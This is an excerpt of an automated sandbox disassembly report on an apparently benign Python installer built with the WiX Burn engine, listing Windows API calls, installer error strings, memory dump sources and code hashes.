                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_memcmp
                                                                                                                                  • String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$c:\agent\_work\138\s\src\burn\engine\cache.cpp$version.dll
                                                                                                                                  • API String ID: 3428363238-1696496526
                                                                                                                                  • Opcode ID: 39efee28b6dea4d91961186972215be9f6e790a8f7d65c70fcc8b0974821ef2b
                                                                                                                                  • Instruction ID: 34de84591312d76cb7201c1673262da47b4dd5ea4d8cdabc50a29ecd09019b23
                                                                                                                                  • Opcode Fuzzy Hash: 39efee28b6dea4d91961186972215be9f6e790a8f7d65c70fcc8b0974821ef2b
                                                                                                                                  • Instruction Fuzzy Hash: 9A413371A00615ABDF10DFA9C841AAFBBB8AF0C714F15417FED05A7291D778ED008BA8
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000001,00000008,?,00000000,?,00000000,00000000,00000001,00000000,?,?,?,00000000,crypt32.dll,00000000), ref: 004949D1
                                                                                                                                  • GetLastError.KERNEL32 ref: 004949DE
                                                                                                                                  • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 00494A89
                                                                                                                                  • GetLastError.KERNEL32 ref: 00494A93
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                  • String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$c:\agent\_work\138\s\src\burn\engine\pipe.cpp
                                                                                                                                  • API String ID: 1948546556-2975516947
                                                                                                                                  • Opcode ID: 763d53d5b0b7f1a27cfe0e15b0c6b43ebdc658dd21a75c4cca4c14ff09147ea7
                                                                                                                                  • Instruction ID: 0e6968112e7da142dd1fa58dae5cf41623d898b17b0501d7c5d5d509d95903b3
                                                                                                                                  • Opcode Fuzzy Hash: 763d53d5b0b7f1a27cfe0e15b0c6b43ebdc658dd21a75c4cca4c14ff09147ea7
                                                                                                                                  • Instruction Fuzzy Hash: 8E31B532D80225BBDB109EA5CC45F6FBB68EB80755F11813BF841A6280D7789E418BDC
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,00485506,00000000,00000000,?,00000000), ref: 004954FE
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00484CE1,?,?,00000000,?,?,?,?,?,?,004CB490,?,?), ref: 00495509
                                                                                                                                  Strings
                                                                                                                                  • Failed to post terminate message to child process., xrefs: 004954E9
                                                                                                                                  • Failed to write exit code to message buffer., xrefs: 00495479
                                                                                                                                  • Failed to wait for child process exit., xrefs: 00495537
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\pipe.cpp, xrefs: 0049552D
                                                                                                                                  • Failed to post terminate message to child process cache thread., xrefs: 004954CD
                                                                                                                                  • Failed to write restart to message buffer., xrefs: 004954A1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                                                                  • String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$c:\agent\_work\138\s\src\burn\engine\pipe.cpp
                                                                                                                                  • API String ID: 1211598281-48580095
                                                                                                                                  • Opcode ID: aa58d2d2462286ddb14098ac2ae07acefd1e373b51bfdb730183bd23d085069c
                                                                                                                                  • Instruction ID: 98dd4132456b5cf0b5fb959b60388a1537f9366864f9e397f17f03b38c9bd48c
                                                                                                                                  • Opcode Fuzzy Hash: aa58d2d2462286ddb14098ac2ae07acefd1e373b51bfdb730183bd23d085069c
                                                                                                                                  • Instruction Fuzzy Hash: 3B21E832940A29BBCF135A91DC05F9F7E68AF00335F210277F800A6291D738AE5097DC
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,00499EE1,00000003,000007D0,00000003,?,000007D0), ref: 0049908C
                                                                                                                                  • GetLastError.KERNEL32(?,00499EE1,00000003,000007D0,00000003,?,000007D0,?,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 00499099
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00499EE1,00000003,000007D0,00000003,?,000007D0,?,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 00499161
                                                                                                                                  Strings
                                                                                                                                  • Failed to verify hash of payload: %ls, xrefs: 0049914C
                                                                                                                                  • Failed to verify catalog signature of payload: %ls, xrefs: 00499128
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cache.cpp, xrefs: 004990D0
                                                                                                                                  • Failed to open payload at path: %ls, xrefs: 004990DD
                                                                                                                                  • Failed to verify signature of payload: %ls, xrefs: 00499109
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                  • String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$c:\agent\_work\138\s\src\burn\engine\cache.cpp
                                                                                                                                  • API String ID: 2528220319-2587096086
                                                                                                                                  • Opcode ID: 083ddd902d8f243ede3cef45c6905f7cf0e83f67a9ff6c6695761ed86903e0e7
                                                                                                                                  • Instruction ID: 3adcd708aa7965a81f0f13a3de1ea45a47517f68fcce23879c32a6900fa71dae
                                                                                                                                  • Opcode Fuzzy Hash: 083ddd902d8f243ede3cef45c6905f7cf0e83f67a9ff6c6695761ed86903e0e7
                                                                                                                                  • Instruction Fuzzy Hash: BA21D336A40622B7DF222A5D9C4EF6B7E18BF10771F11423BFD1466390932D9C609ADA
                                                                                                                                  APIs
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00486C22
                                                                                                                                  • GetLastError.KERNEL32 ref: 00486C2C
                                                                                                                                  • GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00486C70
                                                                                                                                  • GetLastError.KERNEL32 ref: 00486C7A
                                                                                                                                  Strings
                                                                                                                                  • Failed to get volume path name., xrefs: 00486CA8
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\variable.cpp, xrefs: 00486C50, 00486C9E
                                                                                                                                  • Failed to set variant value., xrefs: 00486CC4
                                                                                                                                  • Failed to get windows directory., xrefs: 00486C5A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$DirectoryNamePathVolumeWindows
                                                                                                                                  • String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$c:\agent\_work\138\s\src\burn\engine\variable.cpp
                                                                                                                                  • API String ID: 124030351-3909613369
                                                                                                                                  • Opcode ID: 02fcb679507bbf33f48fd2fadbe35b320d96c4276191ddf76a7d546e16d91a0e
                                                                                                                                  • Instruction ID: 6a9f52633e5d779d93fb2d8d4a76b54a63ec2a766b722b2cc948669eda4f7a83
                                                                                                                                  • Opcode Fuzzy Hash: 02fcb679507bbf33f48fd2fadbe35b320d96c4276191ddf76a7d546e16d91a0e
                                                                                                                                  • Instruction Fuzzy Hash: 77210776D41234A3C760AA558C06F9F626CDB01B11F12456BBD44F7241DA7CED0447EC
                                                                                                                                  APIs
                                                                                                                                  • TlsSetValue.KERNEL32(?,?), ref: 0049AD30
                                                                                                                                  • GetLastError.KERNEL32 ref: 0049AD3A
                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0049AD79
                                                                                                                                  • CoUninitialize.OLE32(?,0049C6D1,?,?), ref: 0049ADB6
                                                                                                                                  Strings
                                                                                                                                  • Failed to initialize COM., xrefs: 0049AD85
                                                                                                                                  • Failed to pump messages in child process., xrefs: 0049ADA4
                                                                                                                                  • Failed to set elevated cache pipe into thread local storage for logging., xrefs: 0049AD68
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\elevation.cpp, xrefs: 0049AD5E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorInitializeLastUninitializeValue
                                                                                                                                  • String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$c:\agent\_work\138\s\src\burn\engine\elevation.cpp
                                                                                                                                  • API String ID: 876858697-4171771178
                                                                                                                                  • Opcode ID: b3aa3b783ac41aba671c5a1d5e79a6e7be7375516ece8f82f6ddc90a371fd716
                                                                                                                                  • Instruction ID: b479ab6a4500b1f5d43a95b9f4b0742d0a7bd2aab78da8c38cbae0494ac49779
                                                                                                                                  • Opcode Fuzzy Hash: b3aa3b783ac41aba671c5a1d5e79a6e7be7375516ece8f82f6ddc90a371fd716
                                                                                                                                  • Instruction Fuzzy Hash: 20110673941635BB8F215B459C06E9FBF69EF01B62B11023BFC04B7650EB689D1086DE
                                                                                                                                  APIs
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00485DD5
                                                                                                                                    • Part of subcall function 004C1571: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004C15E7
                                                                                                                                    • Part of subcall function 004C1571: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 004C161F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$Close
                                                                                                                                  • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                                                  • API String ID: 1979452859-3209209246
                                                                                                                                  • Opcode ID: d6571cec0015754ae29465e8752c1b1431c9ccfe8c17cb1bcdcce2445045d223
                                                                                                                                  • Instruction ID: ded6e36fed682c93df3ff974737f57c422a301240245c0664dbde1653b0f1ffb
                                                                                                                                  • Opcode Fuzzy Hash: d6571cec0015754ae29465e8752c1b1431c9ccfe8c17cb1bcdcce2445045d223
                                                                                                                                  • Instruction Fuzzy Hash: E701D63AE00624F7CB517641DD0AF9EAAA8CF51764F21852FFC0466251977C8E01D38D
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strrchr
                                                                                                                                  • String ID: )K$)K$)K
                                                                                                                                  • API String ID: 3213747228-1881940065
                                                                                                                                  • Opcode ID: 9f1acedcc75d6c98e611d18592d038f462777dbcf9999752fc6943b18af49599
                                                                                                                                  • Instruction ID: 4d7c0321d4c692cd616ef919409dc0cbabef747d5525b6f9e6ee7544e3d8d3c5
                                                                                                                                  • Opcode Fuzzy Hash: 9f1acedcc75d6c98e611d18592d038f462777dbcf9999752fc6943b18af49599
                                                                                                                                  • Instruction Fuzzy Hash: A1B122729012459FDB11CF28C8817EEBBE5EF5A300F1681ABE844AB341D63C9902CB79
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleCP.KERNEL32(I\K,00000000,00000000), ref: 004BC6EA
                                                                                                                                  • __fassign.LIBCMT ref: 004BC8C9
                                                                                                                                  • __fassign.LIBCMT ref: 004BC8E6
                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004BC92E
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004BC96E
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004BCA1A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                  • String ID: I\K
                                                                                                                                  • API String ID: 4031098158-1997202717
                                                                                                                                  • Opcode ID: 43bff627695092a25e9ab50b9ffcf1ccfa1d22e834e7cfadb7e781cf6cbe9af9
                                                                                                                                  • Instruction ID: d7dd40ae98877980b46abcf3c45335af261d9fcba6405fbed3ebc7cf0ee485c0
                                                                                                                                  • Opcode Fuzzy Hash: 43bff627695092a25e9ab50b9ffcf1ccfa1d22e834e7cfadb7e781cf6cbe9af9
                                                                                                                                  • Instruction Fuzzy Hash: AFD18871D002599FDF15CFA8D8C09EEBBB5FF49314F28016AE855BB242D634A906CB68
                                                                                                                                  APIs
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,00000000,00000000,?), ref: 004AA183
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,?), ref: 004AA18D
                                                                                                                                  Strings
                                                                                                                                  • Failed attempt to download URL: '%ls' to: '%ls', xrefs: 004AA26A
                                                                                                                                  • :, xrefs: 004AA206
                                                                                                                                  • Failed to clear readonly bit on payload destination path: %ls, xrefs: 004AA1BC
                                                                                                                                  • download, xrefs: 004AA14D
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\apply.cpp, xrefs: 004AA1B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                  • String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$c:\agent\_work\138\s\src\burn\engine\apply.cpp$download
                                                                                                                                  • API String ID: 1799206407-3795046138
                                                                                                                                  • Opcode ID: 5786c223a02ea298d1ec46fe3c3cf76fc0c1c48009911fd72967ecc69e45b2cb
                                                                                                                                  • Instruction ID: 40d724f33c82f0cfa002e772ce62cf73c23f198bcbcbe9aa32b4ccfaa8f39a0e
                                                                                                                                  • Opcode Fuzzy Hash: 5786c223a02ea298d1ec46fe3c3cf76fc0c1c48009911fd72967ecc69e45b2cb
                                                                                                                                  • Instruction Fuzzy Hash: FB51A276A00219ABDB10DF95C841FAFB7B8FF26714F10855BE805AB340E339DA51CB96
                                                                                                                                  APIs
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,771ADFD0,000000FF,type,000000FF,?,771ADFD0,771ADFD0,771ADFD0), ref: 004C7347
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C7392
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C740E
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C745A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Free$Compare
                                                                                                                                  • String ID: type$url
                                                                                                                                  • API String ID: 1324494773-1247773906
                                                                                                                                  • Opcode ID: e8c29a955944ad00152d55fc40cdd84beee9c435ed0fc9d88bcbbcbc1c5ee03e
                                                                                                                                  • Instruction ID: 0c1fa88835ce910b874f806ca43ffb5e831bfbcdaf779cbde61267b9eae9c06d
                                                                                                                                  • Opcode Fuzzy Hash: e8c29a955944ad00152d55fc40cdd84beee9c435ed0fc9d88bcbbcbc1c5ee03e
                                                                                                                                  • Instruction Fuzzy Hash: 24517D39905219EBCB55DBA4C845FAEBBB8AF04315F1441AEE811E7260D7389E00DF58
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00483A1A: GetProcessHeap.KERNEL32(?,000001C7,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A2B
                                                                                                                                    • Part of subcall function 00483A1A: RtlAllocateHeap.NTDLL(00000000,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A32
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,004A8EAF,000002C0,00000100), ref: 004C88D3
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,004A8EAF,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 004C88EE
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\apuputil.cpp, xrefs: 004C8989
                                                                                                                                  • application, xrefs: 004C88E0
                                                                                                                                  • type, xrefs: 004C8915
                                                                                                                                  • http://appsyndication.org/2006/appsyn, xrefs: 004C88C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareHeapString$AllocateProcess
                                                                                                                                  • String ID: application$c:\agent\_work\138\s\src\libs\dutil\apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                                                                                  • API String ID: 2664528157-2726911551
                                                                                                                                  • Opcode ID: e15f6ee91d0d7b256b8cab9854030742f032fee39248fd814c7f3d348c009e7a
                                                                                                                                  • Instruction ID: 30f26f883d2f142b0cb128a85c27d48f3b50f95476fa40697cce67c68a59866e
                                                                                                                                  • Opcode Fuzzy Hash: e15f6ee91d0d7b256b8cab9854030742f032fee39248fd814c7f3d348c009e7a
                                                                                                                                  • Instruction Fuzzy Hash: EA51C179600301EBDBA09F55CC81F2B77A5AB40764F20851EFA65AB2D1CB79ED408B19
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 004C6917
                                                                                                                                  • DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 004C6A0E
                                                                                                                                  • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 004C6A1D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseDeleteErrorFileHandleLast
                                                                                                                                  • String ID: Burn$DownloadTimeout$WiX\Burn$c:\agent\_work\138\s\src\libs\dutil\dlutil.cpp
                                                                                                                                  • API String ID: 3522763407-4112428647
                                                                                                                                  • Opcode ID: 185ac37cef3de364b9b6541f2387586acd80ff28d0c1c9fcf47898ea57360d41
                                                                                                                                  • Instruction ID: c11255f6d3edf4d77a30ccfb2160d2bf03f22f1c505c2ed5c73e665cdb2d0d25
                                                                                                                                  • Opcode Fuzzy Hash: 185ac37cef3de364b9b6541f2387586acd80ff28d0c1c9fcf47898ea57360d41
                                                                                                                                  • Instruction Fuzzy Hash: B8514C7A900219AFDF51DFA58C41EEFBBB8EF04710F05816AFA14F6150D7398A109BA4
                                                                                                                                  APIs
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,00000001,00000000,?), ref: 00490757
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,00000001,00000000,?), ref: 00490766
                                                                                                                                    • Part of subcall function 004C10B8: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,0049069E,?,00000000,00020006), ref: 004C10DD
                                                                                                                                  Strings
                                                                                                                                  • %ls.RebootRequired, xrefs: 00490674
                                                                                                                                  • Failed to write volatile reboot required registry key., xrefs: 004906A2
                                                                                                                                  • Failed to update resume mode., xrefs: 0049073B
                                                                                                                                  • Failed to delete registration key: %ls, xrefs: 00490705
                                                                                                                                  • Failed to open registration key., xrefs: 0049079C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
